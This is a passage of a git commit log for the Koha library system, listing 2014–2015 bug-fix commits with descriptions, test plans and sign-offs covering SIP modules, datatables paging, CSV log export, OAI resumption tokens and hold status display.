in attempting to set up scripts and basic tests. It
does not help in attempting to modify or debug
this code

This patch changes the package value in the modules
under the C4/SIP directory and makes calls to
them use the full package name.

Where the export mechanism was being short circuited
routines have been explicitly exported and imported
declarations of 'use ILS' when that module was
not being used and which only generated warnings
have been removed.

As a lot of the changes affect lines where
an object is instantiated with new. The opportunity
has been taken to replace the ambiguous indirect
syntax with the preferred direct call

In initializing ILS the full path is added as this
will not require any changes to existing configs.
I suspect this feature is unused, and adds
obfuscation rather than flexibility but have kept
the feature as we need this change in order to
rationalize and extend the testing of the server.

The visible difference is that with the normal Koha
PERL5LIB setting. Compilation of Modules under C4/SIP
should be successful and not fail with unlocated modules,
allowing developers to see any perl warnings

All the SIP modules can now be run through the tests
in t/00-load.t now except for SIPServer itself

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 7904 - remove unnecessary path from SIP script
Robin Sheat [Sun, 9 Nov 2014 22:38:29 +0000 (11:38 +1300)]
Bug 7904 - remove unnecessary path from SIP script

With the fixing of the namespace in the SIP code, we don't need to
modify the PERL5LIB to have the old one.

To test:
* do a package install using this and the other patches on bug 7904
* enable SIP
* make sure koha-start-sip and koha-stop-sip work

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 13979: [3.16.x] updates to allow installation on jessie
Robin Sheat [Tue, 14 Apr 2015 03:28:46 +0000 (15:28 +1200)]
Bug 13979: [3.16.x] updates to allow installation on jessie

This patch makes the build script keep the shipped YUI JavaScript library
instead of explicitly deleting it and using the one the operating system
provides.

Development is done against the YUI library we ship, so this makes sense
even if Debian still shipped it.

Signed-off-by: Josef Moravec <josef.moravec@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years agoBumping version number for 3.16.10 release v3.16.10
Mason James [Thu, 23 Apr 2015 07:17:30 +0000 (19:17 +1200)]
Bumping version number for 3.16.10 release

Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years agoRelease notes for 3.16.10
Mason James [Thu, 23 Apr 2015 05:26:45 +0000 (17:26 +1200)]
Release notes for 3.16.10

Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years agoBug 12820 [QA Followup] - Tab and whitespace cleanup
Kyle M Hall [Fri, 20 Mar 2015 13:09:45 +0000 (09:09 -0400)]
Bug 12820 [QA Followup] - Tab and whitespace cleanup

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
9 years agoBug 12820: Handle rental fees in Sip issue and renew
Colin Campbell [Tue, 10 Feb 2015 17:22:43 +0000 (17:22 +0000)]
Bug 12820: Handle rental fees in Sip issue and renew

Implement correct handling of fees associated with checking out
an item.
This is associated with fee acknowledged field (BO)

To quote from the Sip2 document
" If this field is N in a Checkout message and there is a fee
associated with checking out the item, the ACS should tell the
SC in the Checkout Response that there is a fee, and refuse to
check out the item. If the SC and the patron then interact and the
patron agrees to pay the fee, this field will be set to Y on a second
Checkout message, indicating to the ACS that the patron has acknowledged
the fee and checkout of the item should not be refused just
because there is a fee associated with the item"

So there are two Checkout requests the first with BO not set to Y is
rejected but the fee amount is returned. The Second Checkout with BO set
to Y should succeed.

Added a debug log message indicating why we block a checkout
when we don't otherwise indicate

Signed-off-by: Brendan Gallagher <brendan@bywatersolutions.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
9 years agoBug 13746: Add tests (follow-up)
Mason James [Thu, 23 Apr 2015 04:20:21 +0000 (16:20 +1200)]
Bug 13746: Add tests (follow-up)

increase tests to 48, so t/db_dependent/Serials.t passes clean

Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years agoBug 13746: Add tests
Jonathan Druart [Wed, 25 Feb 2015 12:21:07 +0000 (13:21 +0100)]
Bug 13746: Add tests

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years agoBug 13746: On creating a new subscription, notes fields get confused
Katrin Fischer [Sat, 21 Feb 2015 21:52:30 +0000 (22:52 +0100)]
Bug 13746: On creating a new subscription, notes fields get confused

For every subscription we have 4 notes fields in Koha, 2 are in the
subscription itself and another 2 are in the subscription history.

When creating a new subscription, the notes fields from the
subscription get copied to the fields of the subscription history,
leading to doubled up display of notes in the OPAC.

To test:
- Add a new subscription without patch
  - check manual history
  - Fill in both notes fields
- Verify that the notes fields got also saved into the
  subscription history (easy from the Summary tab)
- Apply patch
- Add another subscription, like above
- Verify now only the subscription notes fields are saved
- Edit subscription and notes - verify all is ok
- Edit subscription history (Planning tab) - verify all is ok

Signed-off-by: Brendan Gallagher <brendan@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years agoBug 13744: Fix datatables paging on 'Holds to pull' report
Katrin Fischer [Sat, 21 Feb 2015 19:40:31 +0000 (20:40 +0100)]
Bug 13744: Fix datatables paging on 'Holds to pull' report

The paging of the datatables on the 'holds to pull' report
page is broken without this patch.

To test:
- Make sure that some holds are placed on available items
  in your installation
- Go to the circulation start page
- Open the 'holds to pull' report
- Verify that the patch fixes the paging on the result table

Also: Fixes "None" in the filter pull downs to be translatable.
Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years agoBug 13744: Fix datatables paging on 'checkout history' page
Katrin Fischer [Sun, 22 Feb 2015 10:10:59 +0000 (11:10 +0100)]
Bug 13744: Fix datatables paging on 'checkout history' page

The paging in the datatable on the 'circulation history' page
is broken without this patch.

/cgi-bin/koha/catalogue/issuehistory.pl?biblionumber=...

To test:
- Search for a record with items that have been checked out
  in the past
- From the detail page, open the 'checkout history' tab
- Check paging displays correctly with this patch and is
  broken without

Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years agoBug 13744: Fix datatables paging on 'order from subscription' page
Katrin Fischer [Sat, 21 Feb 2015 19:30:07 +0000 (20:30 +0100)]
Bug 13744: Fix datatables paging on 'order from subscription' page

The paging of the datatable on the 'order from subscription' page
is broken without this patch.

To test:
- Make sure you have a subscription, note the vendor
- Create a new basket for this vendor
- Add a new order line 'from a subscription'
- Check paging on the result table displays correctly

Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years agoBug 11331 - CSV export for viewlog.pl is missing newlines - followup
Fridolin Somers [Tue, 29 Jul 2014 06:57:54 +0000 (08:57 +0200)]
Bug 11331 - CSV export for viewlog.pl is missing newlines - followup

Perl formatting and cleaning.
Also corrects the HTML of results table in viewlog.tt.

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years ago Bug 11331 - CSV export for viewlog.pl is missing newlines
Fridolin Somers [Fri, 25 Jul 2014 15:01:42 +0000 (17:01 +0200)]
Bug 11331 - CSV export for viewlog.pl is missing newlines

When you try to export the result of tools/viewlog.pl to CSV, the file
cannot be loaded correctly:
  - newline is missing after each record,
  - strings should be enclosed in ""
  - columns are not the same as for screen output

This patch corrects this by using Text::CSV, like the other exports.
Adds a header line made with the keys of the first data. For that, all data
values are initialized with an empty string.

Test plan :
- Use a database with some logs, see sysprefs
  /cgi-bin/koha/admin/preferences.pl?tab=logs
- Go to export page /cgi-bin/koha/tools/viewlog.pl
- Select a module
- Click on "To a file" and choose a file name
- Click on "Submit"
- Open file
   => Without this patch : newline is missing, multi-lines cells are not
      enclosed in "", there are no column headings
   => Without this patch : each line is a data line, complex cells are
      enclosed in "", there are column headings
- Test the export of all modules to see that all headings are necessary
- Check the output to screen in the browser

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
The CSV export is significantly improved. I question the usefulness of
including biblioitemnumber in the output. A better inclusion would be
itemnumber.

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
While this feature is still not perfect, this is a big improvement.
Passes tests and QA script, restores basic functionality.

Signed-off-by: Mason James <mtj@kohaaloha.com>
9 years ago Bug 12122: TransferSlip should accept both itemnumber and barcode
Benjamin Rokseth [Tue, 22 Apr 2014 12:09:16 +0000 (14:09 +0200)]
Bug 12122: TransferSlip should accept both itemnumber and barcode

Added small patch to allow barcode as input in TransferSlip routine, mostly
to allow generating transfer slips where only barcode is present (aka.
javascript).

Test plan:
1) find book with <barcode> and <itemnumber>
2) generate transferslips with both:
  transfer-slip.pl?transferitem=<itemnumber>3967925&branchcode=MPL&op=slip
  transfer-slip.pl?barcode=<barcode>&branchcode=MPL&op=slip
and verify that the generated slips match.

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Edit:
 - Added tests in t/db_dependent/Circulation_transfers.t

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Passes tests and QA script.
Works with both itemnumber or barcode as described.
Tested printing transfer slips with the URL examples given
and in the UI.

9 years ago Bug 13568 OAI Server doesn't handle properly resumption token
Frédéric Demians [Mon, 12 Jan 2015 11:18:19 +0000 (12:18 +0100)]
Bug 13568 OAI Server doesn't handle properly resumption token

When responding to ListRecords and ListIdentifiers verbs, OAI server doesn't
return a proper resumption token. At the end of a result set, OAI server
generates a resumption token even if there aren't any more records. Consequently,
the OAI harvester will send a new request, based on this invalid resumption
token. OAI Server responds with an empty resultset, which is considered as an
invalid response by most of the harvesters.

TO TEST:

- Find in your DB a day where a few biblio records have been created. The
  number of created biblios must be less than OAI-PMH:MaxCount.

- Let's say this day is 2014-01-09. Send an OAI-PMH request to Koha OAI Server:

  /cgi-bin/koha/oai.pl?verb=ListRecords&metadataPrefix=marcxml&from=2014-01-09&until=2014-01-09

- At the end of the result, you will see a resumption token which looks like this:

  <resumptionToken cursor="47">marcxml/47/2014-01-09/2014-01-09/</resumptionToken>

  This is wrong. No resumption token should be sent since there aren't any more
  records to harvest.

- Apply the patch.

- Resend the OAI-PMH request. There is no resumption token at the end of the
  result.

- You could also test with the ListIdentifiers verb in place of ListRecords.

Signed-off-by: Christophe Brocquet <christophe.brocquet@obspm.fr>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years ago Bug 13636 - Staff search results item status incorrect for holds
Kyle M Hall [Wed, 28 Jan 2015 13:31:30 +0000 (08:31 -0500)]
Bug 13636 - Staff search results item status incorrect for holds

Imagine this scenario: we have one record with four items. Two of those
items are checked out, one of those items is a waiting hold, and one of
those items is available. We would expect to see this on the search
results page. Instead, we will see both non-checked out items as
unavailable due to waiting holds.

This is due to a semantic issue in GetReserveStatus.
C4::Search::searchResults uses GetReserveStatus to get the reserve
status of each item, but unlike all other calls to the sub, this one
passes in not only itemnumber, but biblionumber.

When no reserve is found for the available item, the subroutine uses the
biblionumber to grab what is essentially an arbitrary reserve to use for
the status. This makes no sense and this functionality should be
entirely removed from the subroutine so regressions like this will be
prevented in the future.

Test Plan:
1) Create one record with 4 items
   a) check two of the items out to patrons
   b) set one of the items as a waiting hold
   c) leave the fourth item as available
2) Run a search where this record will be in the results list
3) Note that the results list 2 items on loan, two unavailable
4) Apply this patch, reload the search results
5) Note that the results list 1 available, 2 on loan, 1 unavailable

Signed-off-by: John Andrews <jandrews@washoecounty.us>
Signed-off-by: Sheila Kearns <sheila.kearns@state.vt.us>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Note: This is for the staff search result list!

Works as expected.

9 years ago Bug 13298 - Holds ratios report ignores ordered items
Kyle M Hall [Wed, 19 Nov 2014 13:16:17 +0000 (08:16 -0500)]
Bug 13298 - Holds ratios report ignores ordered items

The holds ratio report ignores ordered items. This could cause a library
to inadvertently order more copies of a title than they actually need.
An option should be added to count ordered items ( i.e. any negative
notforloan value ).

Test Plan:
1) Apply this patch
2) Create a record with two items, one regular, one ordered.
3) Place 3 holds on the item
4) Run the reserve ratios report, by default you should see this record
5) Check the new 'include ordered' checkbox, rerun the report
6) Note that record is no longer displayed

Signed-off-by: Heather Braum <hbraum@nekls.org>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
9 years ago Bug 13270: Don't display "vendor note" label if nothing to display
Jonathan Druart [Mon, 17 Nov 2014 16:17:49 +0000 (17:17 +0100)]
Bug 13270: Don't display "vendor note" label if nothing to display

Bug 12111 removes the vendor note edition on receiving.
The label should not be displayed when it's empty.

Test plan:
1/ Receive an order without a vendor note and verify that the label is not
displayed.
2/ Receive an order with a vendor note and verify that the note is
displayed.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Works as described, small template change.

9 years ago Bug 13268: the size should not be emptied in pl script
Jonathan Druart [Thu, 11 Dec 2014 08:50:38 +0000 (09:50 +0100)]
Bug 13268: the size should not be emptied in pl script

It duplicates what the first patch does.

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
9 years ago Bug 13268 - biblioitems.size value not correctly displayed (more)
Fridolin Somers [Mon, 17 Nov 2014 15:32:20 +0000 (16:32 +0100)]
Bug 13268 - biblioitems.size value not correctly displayed (more)

Bug partially corrected by Bug 11357.

The size column in biblioitems is a bit problematic when used in TT, because instead of the size value from the biblio column it will give you the size of the variable or current loop.

It's currently used in the templates like opac-topissues.tt :
[% IF results_loo.size %][% results_loo.size %][% END %]

This patch corrects this by using the item() TT method.
See http://stackoverflow.com/questions/2311303/how-can-i-handle-hash-keys-containing-illegal-identifier-characters-in-template.

Test plan :
- Be sure there is a mapping between a MARC field and biblioitems.size
- Create a record A with biblioitems.size defined : like "10x12"
- Create a record B with no value in biblioitems.size
- Check each modified page :
=> Without this patch : you see a number (loop size) for both records
=> With this patch : you only see the correct value for A and nothing for B

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>